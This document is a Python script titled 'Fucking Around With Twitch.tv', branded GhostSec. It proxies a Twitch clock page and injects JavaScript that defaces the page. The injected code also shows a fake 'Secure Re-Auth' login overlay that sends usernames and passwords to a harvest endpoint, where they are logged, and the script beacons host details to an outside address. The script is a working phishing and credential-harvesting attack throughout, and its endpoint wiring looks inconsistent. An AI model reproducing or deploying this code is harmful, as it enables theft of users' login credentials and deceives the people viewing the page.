Fucking Around With Twitch.tv

1. #!/data/data/com.termux/files/usr/bin/python3
2. import http.server, socketserver, requests, os, time, threading, socket, platform, subprocess
3. from urllib.parse import urlparse, urljoin
4. from flask import Flask, Response, request
5. TARGET = "https://clock.event-engineering.twitch.tv/"
6. TARGET_DOMAIN = urlparse(TARGET).netloc
7. PROXY_PORT = 8888
8. NTP_API_PORT = 8080
9. LOGFILE = os.path.expanduser("~/ghostsec_iframe_cors_bypass.log")
10. HARVEST_LOG = os.path.expanduser("~/ghostsec_harvest.log")
11. FAKE_CLOCK = "1337:GhostSec Override"
12. COOKIE_NAME = "NTPClockOffset"
13. OFFSET = 999999999999
14. PAYLOAD_DOMAIN = f"http://localhost:{PROXY_PORT}"
15. def log(msg):
16.     ts = time.strftime("[%Y-%m-%d %H:%M:%S]")
17.     with open(LOGFILE, "a") as f:
18.         f.write(f"{ts} {msg}\n")
19.     print(f"{ts} {msg}")
20. def harvest(data):
21.     ts = time.strftime("[%Y-%m-%d %H:%M:%S]")
22.     with open(HARVEST_LOG, "a") as f:
23.         f.write(f"{ts} HARVESTED: {data}\n")
24. def generate_payload_js():
25.     return f"""
26.    <script>
27.    document.cookie = "{COOKIE_NAME}={OFFSET}|"+Date.now()+"; path=/;";
28.    const injectOverride = () => {{
29.        try {{
30.            let override = document.getElementById('clock') || document.createElement('div');
31.            override.id = "clock";
32.            override.innerHTML = "{FAKE_CLOCK}";
33.            override.style.cssText = `
34.                color: lime;
35.                font-size: 48px;
36.                font-weight: bold;
37.                text-align: center;
38.                margin-top: 25vh;
39.            `;
40.            document.body.innerHTML = "";
41.            document.body.appendChild(override);
42.        }} catch(e){{}}
43.    }};
44.    injectOverride();
45.    const obs = new MutationObserver(injectOverride);
46.    obs.observe(document.body, {{ childList: true, subtree: true }});
47.    const originalFetch = window.fetch;
48.    window.fetch = (...args) => {{
49.        return originalFetch(...args).then(response => {{
50.            return response.text().then(text => {{
51.                return new Response(text.replace(/\\d\\d?:\\d\\d(?::\\d\\d)?/g, "{FAKE_CLOCK}"));
52.            }});
53.        }});
54.    }};
55.    Date.prototype.getTime = function() {{ return {int(time.time() * 1000) + OFFSET}; }};
56.    window.addEventListener('load', () => {{
57.        let form = document.createElement('form');
58.        form.id = "ghostsecForm";
59.        form.innerHTML = `
60.            <div style='position:fixed;top:0;left:0;width:100%;height:100%;background:black;z-index:9999;display:flex;align-items:center;justify-content:center;flex-direction:column;color:#0f0;font-family:monospace;'>
61.                <h2>Secure Re-Auth</h2>
62.                <input type='text' name='username' placeholder='Username' style='margin:5px;padding:10px;' />
63.                <input type='password' name='password' placeholder='Password' style='margin:5px;padding:10px;' />
64.                <button type='submit' style='padding:10px;'>Authenticate</button>
65.            </div>
66.        `;
67.        form.onsubmit = e => {{
68.            e.preventDefault();
69.            const u = form.username.value;
70.            const p = form.password.value;
71.            fetch('/harvest', {{
72.                method: 'POST',
73.                headers: {{ 'Content-Type': 'application/json' }},
74.                body: JSON.stringify({{user:u, pass:p}})
75.            }});
76.            document.body.innerHTML = '<h1 style="color:lime;text-align:center;margin-top:40vh;">Session Restored</h1>';
77.        }};
78.        document.body.appendChild(form);
79.    }});
80.    </script>
81.    """
82. class ProxyHandler(http.server.BaseHTTPRequestHandler):
83.     def do_GET(self):
84.         if self.path == "/harvest":
85.             self.send_response(405)
86.             self.end_headers()
87.             return
88.         upstream_url = urljoin(TARGET, self.path)
89.         log(f"[+] Requesting: {upstream_url}")
90.         try:
91.             headers = {
92.                 'User-Agent': self.headers.get('User-Agent'),
93.                 'Referer': TARGET,
94.                 'Origin': TARGET
95.             }
96.             response = requests.get(upstream_url, headers=headers, verify=True, allow_redirects=True)
97.             content_type = response.headers.get("Content-Type", "text/html")
98.             content = response.text
99.             if "text/html" in content_type:
100.                 inject_js = generate_payload_js()
101.                 if "</body>" in content:
102.                     content = content.replace("</body>", inject_js + "</body>")
103.                 else:
104.                     content += inject_js
105.             self.send_response(200)
106.             self.send_header("Content-type", content_type)
107.             self.send_header("Access-Control-Allow-Origin", "*")
108.             self.send_header("Access-Control-Allow-Methods", "GET, POST, OPTIONS")
109.             self.send_header("Access-Control-Allow-Headers", "*")
110.             self.end_headers()
111.             self.wfile.write(content.encode('utf-8'))
112.         except Exception as e:
113.             log(f"[-] Proxy Error: {e}")
114.             self.send_error(502, f"Proxy failed: {e}")
115. def start_proxy_server():
116.     with socketserver.TCPServer(("", PROXY_PORT), ProxyHandler) as httpd:
117.         log(f"[+] Local Proxy Active @ {PAYLOAD_DOMAIN}")
118.         subprocess.run(["termux-open-url", PAYLOAD_DOMAIN])
119.         httpd.serve_forever()
120. def launch_ntp_spoof_server():
121.     app = Flask("GhostSecNTP")
122.     @app.route("/ntp")
123.     def spoof():
124.         spoofed = f"{OFFSET}:{int(time.time() * 1000)}"
125.         log(f"[+] Spoofed NTP Response Served: {spoofed}")
126.         return Response(spoofed, mimetype='text/plain')
127.     @app.route("/harvest", methods=["POST"])
128.     def receive():
129.         data = request.get_json()
130.         if data:
131.             harvest(data)
132.         return Response("OK", mimetype='text/plain')
133.     threading.Thread(target=app.run, kwargs={'port': NTP_API_PORT, 'host': '0.0.0.0'}, daemon=True).start()
134.     log(f"[+] NTP + Harvest API Active on http://localhost:{NTP_API_PORT}/")
135. def environment_beacon():
136.     try:
137.         host = socket.gethostname()
138.         info = f"Host: {host} | Platform: {platform.platform()} | User: {os.environ.get('USER', 'unknown')}"
139.         log("[+] Host Environment:")
140.         log(info)
141.         with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
142.             s.sendto(info.encode(), ("1.1.1.1", 53))
143.     except Exception as e:
144.         log(f"[-] Environment beacon failed: {e}")
145. def resolve_dns():
146.     try:
147.         ip_list = socket.gethostbyname_ex(TARGET_DOMAIN)
148.         log(f"[+] Resolved DNS for {TARGET_DOMAIN}: {ip_list}")
149.     except Exception as e:
150.         log(f"[-] DNS resolution error: {e}")
151. if __name__ == "__main__":
152.     log("=== GhostSec :: Mirror + Deface + Harvest Operational ===")
153.     launch_ntp_spoof_server()
154.     resolve_dns()
155.     environment_beacon()
156.     start_proxy_server()